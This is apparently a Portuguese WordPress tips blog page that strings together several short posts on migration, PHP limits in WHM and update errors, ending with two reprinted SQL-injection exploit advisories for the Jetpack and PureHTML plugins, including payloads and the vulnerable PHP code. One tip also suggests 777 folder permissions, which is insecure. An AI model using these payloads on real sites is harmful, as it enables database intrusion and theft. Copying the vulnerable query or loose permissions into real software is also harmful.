Como Migrar seu Site WordPress com o Plugin Duplicator
Créditos: CanalWP
Se deseja mudar o domínio ou está interessado em fazer um backup e instalar em um servidor local do WordPress, será necessário fazer a troca de endereço do blog.
Além da cópia de todos os arquivos, será necessário atualizar algumas informações no banco de dados para fazer a troca de domínios. Para isso a maneira mais rápida é através da edição do banco de dados, veja a seguir o passo a passo de como fazê-lo de maneira prática, rápida e totalmente segura. (mais…)
Mesmo que você não seja um entendido no assunto, provavelmente já ouviu falar do WordPress. A plataforma é hoje a mais popular do mundo para a construção e desenvolvimento de websites, desde blogs ou sites corporativos até complexos sistemas e lojas virtuais.
Bem, antes de tudo, é preciso diferenciar o WordPress.com, que é uma plataforma online na qual você pode montar, gratuitamente, seu blog (como o Blogger ou o Tumblr), do WordPress.org. Nesse segundo website, é possível fazer o download de um arquivo ZIP que contém a instalação do sistema WordPress – é sobre ele que o seu site é construído.
O webmaster instala esse pacote do WordPress.org em seu serviço de webhost e, a partir dele, poderá criar um banco de dados para seu website e começar a montá-lo, inserindo ou modificando funcionalidades e alterando o chamado tema, que é a “cara” que o seu website vai ter. (mais…)
Passos para Sanar o Problema:
1 – Entre no WHM como root,
2 – Siga os menus e submenus (->) Home (Início) -> Service Configuration -> PHP Configuration Editor,
3 – Localize o item Memory_Limit, esse deve possuir PELO MENOS 320mb (sim, há plugins pesados que consomem muita ram),
4 – Localize Upload_max_filesize, apesar de não influenciar aqui, no momento de uploads você pode se dar mal, deixe pelo menos 500MB (nossa hospedagem permite 2gb de upload),
5 – Localize Max_execution_time, deixe pelo menos 600s (para uploads longos ou processos de plugins será de suma importância ter execução longa),
6 – Localize Max_input_time e deixe pelo menos 300s.
De todos os pontos que citamos, os 2 principais para sanar o problema são MEMORY_LIMIT e Max_Execution_Time.
Fonte: http://webking.com.br/blog/wordpress-dando-pagina-branca-blank-pages-in-wordpress-cpanel-whm/
Se você está recebendo a mensagem -> Ocorreu um erro inesperado (unexpected error) <— ao tentar fazer QUALQUER coisa remota do wordpress (instalar uma versão, atualizar um plugin, instalar um plugin, ver o Akismet e etc) nem se preocupe, a saída é simples e clara:
1 – Veja se a porta de saída 80 está liberada no seu firewall (bom deixar também a 443 de SSL),
2 – Veja se as pastas do wordpress estão com permissão correta (755 sob suExec ou 777 em DSO sem suExec), assim como arquivos php com permissões corretas -> 644.
3 – Caso os dois pontos acima estejam ok mande o admin do servidor fazer um teste, no arquivo /etc/resolv.conf mande colocar no começo do arquivo:
nameserver 8.8.8.8
nameserver 8.8.4.4
Esses dois nameservers resolvem publicamente usando infra-estrutura “fraquinha da Google”.
Recentemente foi publicada na Icentral uma forma de inibir a frequência de ataques realizados a sites que usam Gestores de Conteúdos (mais conhecidos como CMS). A dica é simples e facilmente compreendida, recomendamos a leitura fortemente. Para acessar o conteúdo clique no link abaixo:
######################################################
# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability |
# Date: 2011-19-11 |
# Author: longrifle0x |
# software: WordPress |
# Download:http://wordpress.org/extend/plugins/jetpack/ |
# Tools: SQLMAP |
###################################################### |
*DESCRIPTION |
Discovered a vulnerability in jetpack, WordPress Plugin, |
vulnerability is SQL injection. |
File:wp-content/plugins/jetpack/modules/sharedaddy.php |
Exploit: id=-1; or 1=if |
*Exploitation*http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][CURRENT_USER()http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE user='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END) |
http://localhost:80/wp-content/plugins/jetpack/modules/sharedaddy.php |
[GET][id=-1][MID((VERSION()),1,6)
# Exploit Title: WordPress PureHTML plugin < = 1.0.0 SQL Injection Vulnerability # Date: 2011-08-31 # Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) # Software Link: http://downloads.wordpress.org/plugin/pure-html.1.0.0.zip # Version: 1.0.0 (tested) # Note: magic_quotes has to be turned off --------------- PoC (POST data) --------------- http://www.site.com/wp-content/plugins/pure-html/alter.php PureHTMLNOnce=1&action=delete&id=-1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20
—————
Vulnerable code
—————
if(!isset($_POST[‘PureHTMLNOnce’])){
if ( !db_unx_verify_nonce( $_POST[‘PureHTMLNOnce’], plugin_basename(__FILE__) )) {header(“location:”.$refer);}
}
else{
…
if(isset($_POST[‘id’])){$id = $_POST[‘id’];}else{$id=’0′;}
…
$action = $_POST[‘action’];
#delete
if($action == “delete”){
$sql = “delete from “.$wpdb->prefix.”pureHTML_functions WHERE id='”.$id.”‘”;
$wpdb->query($wpdb->prepare($sql)); //misusage of $wpdb->prepare() :)